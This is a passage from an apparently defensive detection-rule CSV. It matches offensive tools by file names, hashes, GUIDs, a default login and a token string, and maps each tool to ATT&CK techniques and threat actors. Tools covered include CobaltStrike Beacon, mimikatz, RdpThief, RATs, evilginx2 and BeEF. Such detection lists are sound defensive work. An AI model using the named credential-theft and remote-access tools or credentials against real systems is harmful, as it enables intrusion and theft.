- Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35730" "*BeaconTool -i online_info.txt -aes decrypt*",".{0,1000}BeaconTool\s\-i\sonline_info\.txt\s\-aes\sdecrypt.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker 
- Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35731" "*BeaconTool/lib/sleep.jar*",".{0,1000}BeaconTool\/lib\/sleep\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35732" 
"*BeaconUseToken*",".{0,1000}BeaconUseToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","35733" "*bead5b0e022e634f9f775533f0e7df11aae0e6d1a1616ed7e1bef02abe38ca84*",".{0,1000}bead5b0e022e634f9f775533f0e7df11aae0e6d1a1616ed7e1bef02abe38ca84.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - 
T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","35734" "*beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509*",".{0,1000}beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35735" "*Bearer c29tZWludmFsaWQ6Y29tYmluYXRpb24=*",".{0,1000}Bearer\sc29tZWludmFsaWQ6Y29tYmluYXRpb24\=.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","35736" "*Beau Bullock (@dafthack)*",".{0,1000}Beau\sBullock\s\(\@dafthack\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","35737" "*beb128325351c7c87a1928ec9cb98e595f39b3da1a105bf229b04548644a3957*",".{0,1000}beb128325351c7c87a1928ec9cb98e595f39b3da1a105bf229b04548644a3957.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","35738" "*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*",".{0,1000}beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","35739" "*beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a*",".{0,1000}beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35740" "*BEB67A6E-4C54-4DE5-8C6B-2C12F44A7B92*",".{0,1000}BEB67A6E\-4C54\-4DE5\-8C6B\-2C12F44A7B92.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","35741" 
"*beb8955b03b3bc379ad4fb6df1d54b1b5c0aa7226a0f2036a9cfe9a4eac5b488*",".{0,1000}beb8955b03b3bc379ad4fb6df1d54b1b5c0aa7226a0f2036a9cfe9a4eac5b488.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35742" "*beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592*",".{0,1000}beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35743" "*beb9a98df0d88653ba149728d157a519df367a2015fd2d120daeef988027ba6f*",".{0,1000}beb9a98df0d88653ba149728d157a519df367a2015fd2d120daeef988027ba6f.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","35744" "*BEBE6A01-0C03-4A7C-8FE9-9285F01C0B03*",".{0,1000}BEBE6A01\-0C03\-4A7C\-8FE9\-9285F01C0B03.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#GUIDproject","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","35745" "*BEBE6A01-0C03-4A7C-8FE9-9285F01C0B03*",".{0,1000}BEBE6A01\-0C03\-4A7C\-8FE9\-9285F01C0B03.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text 
Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#GUIDproject","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","35746" "*bec183f1fa76d90ec29cd04ceaf23d80098d71df52ecc378b34260e036b958c7*",".{0,1000}bec183f1fa76d90ec29cd04ceaf23d80098d71df52ecc378b34260e036b958c7.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","35747" "*bec1bf8b5dc63cdda1a346684b1ebdae02cb2f34d18ef589debc018d6bc04253*",".{0,1000}bec1bf8b5dc63cdda1a346684b1ebdae02cb2f34d18ef589debc018d6bc04253.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35748" "*bec3552674f4aa1fe8bdeb2776005fb3098de9a86c22d81021a09f1ede608a5c*",".{0,1000}bec3552674f4aa1fe8bdeb2776005fb3098de9a86c22d81021a09f1ede608a5c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - 
TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35749" "*becb807e8d5a4508b1ea3e4e8ab5af60fd5dcfc4e938a58c1694cc968aab521a*",".{0,1000}becb807e8d5a4508b1ea3e4e8ab5af60fd5dcfc4e938a58c1694cc968aab521a.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","35750" "*bed163d2dafa8fc4074ece57cdb10edaf275ddf5599375b9d58e025bd0cf42ef*",".{0,1000}bed163d2dafa8fc4074ece57cdb10edaf275ddf5599375b9d58e025bd0cf42ef.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35751" "*bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90*",".{0,1000}bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35752" "*bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2*",".{0,1000}bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35754" "*bee31d03a675de4ba18634b913bb303edbb8854357dcac687facbcf2afb42804*",".{0,1000}bee31d03a675de4ba18634b913bb303edbb8854357dcac687facbcf2afb42804.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35755" "*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY 
BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35758" "*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35759" 
"*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35760" "*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35761" "*bee821a0267335398f5db2ced5c2e2687ced844c8a1627d111d4fd0692b791e6*",".{0,1000}bee821a0267335398f5db2ced5c2e2687ced844c8a1627d111d4fd0692b791e6.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","35762" "*BEE88186-769A-452C-9DD9-D0E0815D92BF*",".{0,1000}BEE88186\-769A\-452C\-9DD9\-D0E0815D92BF.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","35763" "*beec549317fffcc123e613d5f931f5c4441e7b77ef09a21582a795d3fee816f5*",".{0,1000}beec549317fffcc123e613d5f931f5c4441e7b77ef09a21582a795d3fee816f5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35764" 
"*beef:beef*",".{0,1000}beef\:beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35765" "*beef_bind_tcp-stage.asm*",".{0,1000}beef_bind_tcp\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35766" "*beef_bind_tcp-stager.asm*",".{0,1000}beef_bind_tcp\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35767" "*beef_bind-stage*.rb*",".{0,1000}beef_bind\-stage.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35768" "*beef_bind-stage.asm*",".{0,1000}beef_bind\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35769" "*beef_bind-stager.asm*",".{0,1000}beef_bind\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35770" "*beef_test.rb*",".{0,1000}beef_test\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35771" "*beefproject*",".{0,1000}beefproject.{0,1000}","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - 